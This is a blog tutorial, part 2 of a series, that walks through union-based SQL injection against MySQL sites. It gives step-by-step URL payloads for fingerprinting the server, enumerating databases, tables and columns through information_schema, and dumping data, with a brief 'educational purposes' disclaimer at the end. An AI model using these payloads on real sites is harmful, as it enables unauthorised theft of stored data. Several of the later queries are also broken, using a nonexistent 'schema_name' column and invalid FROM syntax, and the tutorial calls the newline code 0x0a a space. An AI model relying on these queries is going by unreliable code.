SQL Injection Union Based Exploitation : Part 2 The Injection

SQL Injection Union Based Exploitation : Part 2 The Injection

This is the second part of the Union Based SQL injection Tutorial . If you have missed the first part of the Tutorial , I would suggest you to visit the this Link .

The previous part ended with finding the number of Columns in the database . In this part we will actually exploit the Web Application and inject the SQL queries .

Here are a few standard SQL functions/queries which will help you with the injection . You can consider this a a mini Cheat sheet . If you can remember these few instructions , it ‘ll be helpful .

Code:
@@version - shows the version of MySQL.
 version() - shows the version of MySQL.
 database() - shows the name of the database.
 user() - shows the current DB user

The first thing to do while injecting is to check the version of MySQL. Use either @@version or version() for it. If the version is 5 or greater, our work will be much easier. This is because, in versions 5 and greater, MySQL has introduced information_schema which has the information about all the databases and tables. It makes our work a lot easier. If the version is lesser than 5, you will have to “guess” the table names which is a pain in the ass.

So, I’m going to find the database version:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,@@version,3 --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,@@version,3 --

It gives me this:

The version is >5, so its all good, I can use information_schema.

Okay now, let’s dump the tables. Dumping the Tables is an important step in the penetration testing of web applications for SQL injection .

Dumping Tables:

As I already said before, we have information_schema on versions greater than 5. So we’re going to use it to dump tables.

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(table_name, 0x0a),3 FROM information_schema.tables WHERE table_schema = database() --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name, 0x0a),3 FROM information_schema.tables WHERE table_schema = database() --

Let’s break it down:

group_concat(table_name, 0x0a) – it combines the table_name and 0x0a (it is hex code for space, just to make your dump look neat)

FROM information_schema.tables WHERE table_schema = database() – we are telling the database to retrieve table_name from information_schema.tables where table_schema is the current database.

So that gives us the table names. Now let’s dump the column names.

Dumping Columns:

It is almost similar to dumping table names:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(column_name, 0x0a),3 FROM information_schema.columns WHERE table_name = [0xhex value of table name] --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name, 0x0a),3 FROM information_schema.columns WHERE table_name = [0xhex value of table name] --

Let’s break it down:

group_concat() – it combines the column_name and 0x0a (it is hex code for space, just to make your dump look neat)

FROM information_schema.columns WHERE table_name = [0xhex value of table name] – we are telling the DB to retrieve column_name from information_schema.columns where table_name is 0x followed by the name of the table in hex format.

So that gives use the column names. Once we know the column names and the table names, it is quite easy to dump the data in the tables.

Dumping Data from Tables:

Dumping the data is quite easy after we know the table names and the column names.

To dump data:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(column_name_1, 0x3a, column_name_2, 0x0a),3 FROM "name of the table" --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name_1, 0x3a, column_name_2, 0x0a),3 FROM "name of the table" --

Let’s break it down:

group_concat(column_name_1, 0x3a, column_name_2, 0x0a) – We are specifying the columns we are willing to dump, you should put your column names instead of column_name_1 and column_name_2. You can dump as many columns as you want using the group_concat() function. 0x3a is just hex code for the character “:”, just to make it look good. You can really put any character you want. Just put 0x followed by the hex value of the character.
FROM “name of the table” – we are specifying where to dump the data from. Put your table name inside the quotes.

Use this to convert text to hex: http://www.swingnote.com/tools/texttohex.php

Dump Data From Other Databases on the MySQL server that the Website Uses:

It is quite common for a website to use more than one DB. So let’s see how to dump data from the other DBs are present on the mysql server that the website uses.

Finding the list of DBs on the mysql server that the website uses:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(schema_name, 0x0a),3 FROM information_schema.schemata --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(schema_name, 0x0a),3 FROM information_schema.schemata --

Let’s break it down:

group_concat(schema_name, 0x0a) – it combines the schema_name and 0x0a (it is hex code for space, just to make your dump look neat)
FROM information_schema.schemata – we are specifying where to look for the ‘list’ of DBs.

Now that you have the DB names, we can proceed to dump data from them.

Dumping Table names from a DB which is not the current DB:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(table_name, 0x0a),3 FROM information_schema.tables WHERE table_schema = [0xhexdatabase name] --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name, 0x0a),3 FROM information_schema.tables WHERE table_schema = [0xhexdatabase name] --

Let’s break it down:

group_concat(table_name, 0x0a) – it combines the table_name and 0x0a (it is hex code for space, just to make your dump look neat)
FROM information_schema.tables WHERE table_schema = [0xhexdatabase name] – we are specifying from where to retrieve table_name from. While dumping the table names of the current database, we used database() function. But since we are dumping from a DB which is not the current DB, we will have to specify the name of the DB in hex.

Now that we have the table name, let’s dump the column names.

Dumping the Column names of a table from a DB which is not the current DB:

It is almost similar to dumping table names:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(column_name, 0x0a),3 FROM information_schema.columns WHERE schema_name=0xhexdbname AND table_name=0xhextablename --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name, 0x0a),3 FROM information_schema.columns WHERE schema_name=0xhexdbname AND table_name=0xhextablename --

Let’s break it down:

group_concat() – it combines the column_name and 0x0a (it is hex code for space, just to make your dump look neat)

FROM information_schema.columns WHERE schema_name=0xhexdbname AND table_name=0xhextablename – We are specifying where to retrieve the column names from. Since we are dumping from a DB that is not the current DB, we have to specify both the table name and also the dbname using table_name and schema_name respectively in hex.

Dumping Data from Tables from a DB which is not the current DB:

Dumping the data is quite easy after we know the table names and the column names.

To dump data:

If you have a string based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1' UNION SELECT 1,group_concat(column_name_1, 0x3a, column_name_2, 0x0a),3 FROM table_name=0xhextablename where schema_name=0xhexdbname --+

If you have a normal union based injection, the payload becomes:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name_1, 0x3a, column_name_2, 0x0a),3 FROM table_name=0xhextablename where schema_name=0xhexdbname  --

Let’s break it down:

group_concat(column_name_1, 0x3a, column_name_2, 0x0a) – We are specifying the columns we are willing to dump, you should put your column names instead of column_name_1 and column_name_2. You can dump as many columns as you want using the group_concat() function. 0x3a is just hex code for the character “:”, just to make it look good. You can really put any character you want. Just put 0x followed by the hex value of the character.

FROM table_name=0xhextablename where schema_name=0xhexdbname – we are specifying where to dump the data from. Since we are dumping from a DB which is not the current DB, we will have to specify both the table name and also the dbname using table_name and schema_name respectively in hex.

#Purely for Educational Purposes . Do not use for Un-Authorized Penetration Testing is a Crime.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s